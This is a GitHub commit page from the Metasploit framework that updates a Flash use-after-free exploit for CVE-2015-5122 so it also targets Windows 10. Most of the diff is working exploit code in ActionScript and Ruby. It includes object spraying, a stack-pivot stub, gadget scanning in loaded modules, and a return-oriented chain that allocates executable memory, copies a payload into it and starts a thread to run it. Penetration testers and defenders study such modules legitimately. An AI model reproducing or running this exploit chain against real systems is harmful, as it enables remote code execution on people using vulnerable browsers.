Skip to content
Permalink
Browse files

Land #11924, Update adobe_flash_opaque_background_uaf for Win 10

  • Loading branch information...
wchen-r7 committed Jun 4, 2019
2 parents 30a0f25 + 191d73f commit b8abb550e60fefb05f5c8bbb4c03f9d018231738
@@ -261,7 +261,7 @@ GEM
metasm
rex-arch
rex-text
rex-exploitation (0.1.20)
rex-exploitation (0.1.21)
jsobfu
metasm
rex-arch
BIN +238 Bytes (100%) data/exploits/CVE-2015-5122/msf.swf
Binary file not shown.
@@ -56,17 +56,17 @@ package
}

static function Magic(...a){}
private function spray_objects():void
{
Logger.log("[*] Exploiter - spray_objects()")
// mov eax,[esp+0x4]
// xchg eax,esp
// rets
stub[0] = 0x0424448B
stub[1] = 0x0000C394
for (var i:uint = 0; i < spray.length; i++)
{
spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
@@ -173,17 +173,18 @@ package
Logger.log("[*] Exploiter - do_rop_windows()")
var pe:PE = new PE(eba)
var flash:uint = pe.base(vtable)
var winmm:uint = pe.module("winmm.dll", flash)
var kernel32:uint = pe.module("kernel32.dll", winmm)
var dsound:uint = pe.module("dsound.dll", flash)
var kernel32:uint = pe.module("kernel32.dll", dsound)
var ntdll:uint = pe.module("ntdll.dll", kernel32)
var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
var createthread:uint = pe.procedure("CreateThread", kernel32)
var memcpy:uint = pe.procedure("memcpy", ntdll)
var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)

var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, flash)
var popecxret:uint = pe.gadget("c359", 0x0000ffff, flash)
var movecxpeaxret:uint = pe.gadget("c30189", 0x00ffffff, flash)

// Continuation of execution
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, magic_table, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, magic_object, false) // mov ebx, main
@@ -197,24 +198,35 @@ package
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot

eba.write(0, virtualprotect)
// VirtualProtect
// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
eba.write(0, 0x40)
eba.write(0, buffer + 0x8) // Writable address (4 bytes)

// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7f6e0000)
eba.write(0, popecxret)
eba.write(0, 0x0) // NULL
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE

// Put the allcated memory address on the dest argument of memcpy
eba.write(0, stack_address + 0x18000 + 0x4c)
eba.write(0, movecxpeaxret) // mov [ecx], eax; ret;

// Put the allocated memory address on the lpStartAddress of CreateThread
eba.write(0, popecxret)
eba.write(0, stack_address + 0x18000 + 0x68)
eba.write(0, movecxpeaxret) // mov [ecx], eax; ret;

eba.write(0, memcpy)

// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7f6e0000)
eba.write(0, 0x41414141) // dest
eba.write(0, payload_address + 8)
eba.write(0, payload.length)

@@ -223,13 +235,13 @@ package
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7f6e0000)
eba.write(0, 0x41414141) // lpStartAddress
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
for (var i:uint; i < 0x100; i++) {
eba.write(stack_address + 8 + (i * 4), eba.read(magic_table - 0x80 + i * 4))
eba.write(stack_address + 8 + (i * 4), eba.read(magic_table - 0x80 + i * 4))
}

// VirtualProtect the stub with a *reliable* stackpivot
@@ -287,7 +299,7 @@ package

// Put the popen parameters in memory
eba.write(payload_address + 0x8, payload, true) // false

// Put the fake stack/vtable on memory
eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
@@ -54,16 +54,17 @@ package
{
var find:uint = 0
var contents:uint = 0
var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
var baseOfCode:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x2c)
var sizeOfCode:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x1c)
var value:uint = parseInt(gadget, 16)

for (var i:uint = 0; i < limit - 4; i++) {
contents = eba.read(addr + i)
for (var i:uint = 0; i < sizeOfCode - 3; i++) {
contents = eba.read(baseOfCode + i)
if (hint == 0xffffffff && value == contents) {
return addr + i
return baseOfCode + i
}
if (hint != 0xffffffff && value == (contents & hint)) {
return addr + i
return baseOfCode + i
}
}
throw new Error()
@@ -31,6 +31,7 @@ def initialize(info={})
windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.203,
Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.160 and
Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194
Windows 10 Build 10240 (32-bit) IE11, Firefox 39.0 and Adobe Flash 18.0.0.203
},
'License' => MSF_LICENSE,
'Author' =>
@@ -60,7 +61,8 @@ def initialize(info={})
os =~ OperatingSystems::Match::WINDOWS_XP ||
os =~ OperatingSystems::Match::WINDOWS_VISTA ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
os =~ OperatingSystems::Match::WINDOWS_81 ||
os =~ OperatingSystems::Match::WINDOWS_10
end,
:ua_name => lambda do |ua|
case target.name

0 comments on commit b8abb55

Please sign in to comment.
You can’t perform that action at this time.